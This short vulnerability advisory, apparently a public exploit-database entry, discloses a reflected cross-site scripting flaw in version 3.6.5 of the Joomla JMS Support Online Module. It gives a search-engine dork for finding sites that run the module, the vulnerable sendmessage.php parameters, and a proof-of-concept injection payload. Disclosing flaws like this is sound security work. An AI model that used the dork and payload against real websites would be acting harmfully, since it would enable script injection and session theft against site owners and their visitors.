Joomla JMS Support Online Module 3.6.5 Cross Site Scripting
Posted on 22 February 2017
Exploit Title : Joomla JMS Support Online Module Reflected XSS - skype extension Google Dork : inurl:sendmessage.php?type=skype Date : 12/02/2017 Exploit Author : Marc Castejon <marc@silentbreach.com> Vendor Homepage : https://www.joommasters.com Version: 3.6.5 Type : webapps Platform: Joomla ------------------------------------------------ Type: Reflected XSS Vulnerable URL:http://localhost/[PATH]/sendmessage.php Vulnerable Parameters: ?type=skype&user=<vulnerable>&skype=<vulnerable> Method: GET Payload: "><img src=i onerror=prompt(2)>